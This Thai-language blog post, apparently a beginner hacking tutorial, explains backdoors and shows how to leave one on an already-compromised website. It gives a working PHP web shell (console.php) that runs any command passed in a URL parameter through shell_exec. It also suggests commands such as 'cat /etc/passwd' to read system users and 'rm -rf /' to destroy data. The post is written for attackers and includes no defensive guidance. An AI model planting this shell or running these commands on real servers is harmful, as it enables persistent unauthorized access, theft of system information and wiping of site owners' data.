Press "Enter" to skip to content

การวาง backdoor แบบง่ายๆ

ก่อนอื่นมารู้จักกันก่อนว่า backdoor นั้นคืออะไร?
Backdoor นั้นก็คือ “ประตูหลัง” (อย่าคิดลึก) จริงๆ แล้วในด้าน security นั้นหมายถึงคือ เมื่อเรา hack ได้แล้ว อาจจะเป็นเว็บหรือ application อะไรก็แล้วแต่ ที่ออนไลน์อยู่ ถ้าต้องการเข้าสู่ระบบใหม่ในภายหลังให้ง่ายขึ้น hacker ก็จะสร้างประตูลับของตัวเองเพื่อกลับเข้ามาใหม่

ยกตัวอย่างให้เห็นภาพชัดๆ เช่น

มีบ้านหลังหนึ่งเมื่อมีขโมยได้ทำการเข้ามาในบ้านโดยการงัดประตูสำเร็จ ขโมยก็ได้ของติดมือไปนิดหน่อย เพราะจะนำของกลับไปหมดก็คงไม่ไหว เลยต้องทยอยๆ ขโมยเลื่อนๆ แต่จะเข้ามาใหม่โดยการงัดประตูบ้านก็เกรงว่าจะถูกจับได้ก่อน ขโมยก็เลยทำทางเข้าที่หน้าต่างโดยให้เปิดเข้ามาจากภายนอก และกลับมาขโมยใหม่วันหลังได้สะดวกมากขึ้น

ที่นี้เข้าเรื่อง สมมุติว่าเรา hack web ได้แล้ว
ชื่อว่า http://127.0.0.1/nonmadden
และได้ทำการสร้างไฟล์ console.php ไว้ที่ root path ดังนี้

<?php
  $cmd = isset($_GET['cmd']) ? $_GET['cmd'] : 'ls -l';
  echo "executing shell command: -> $cmd</br>";
  $output = shell_exec($cmd);
  echo "<pre>$output</pre>";
?>

และถ้าเราเรียก http://127.0.0.1/nonmadden/console.php?cmd=ls -l
การทำงานของโค๊ดด้วยบนจะเป็นลักษณะนี้

shell_exec('ls -l');

การทำงานก็จะโชว์ list ต่างๆ

ตัวอย่างดังรูป

Screen Shot 2015-04-28 at 22.54.22
Screen Shot 2015-04-28 at 22.54.36

ที่นี้อยู่ที่ว่าคุณจะไปใช้ทำอะไร?
อาจจะดูว่ามี user อะไรบ้างในระบบและทำอะไรได้บ้างเช่น

cat /etc/passwd

แต่ถ้าไม่โชคดีขนาดนั้นอาจจะโดนคำสั่งทำลายล้างเช่น

rm -rf /
Arnon Hongklay
Arnon Hongklay

View all posts

Comments are closed.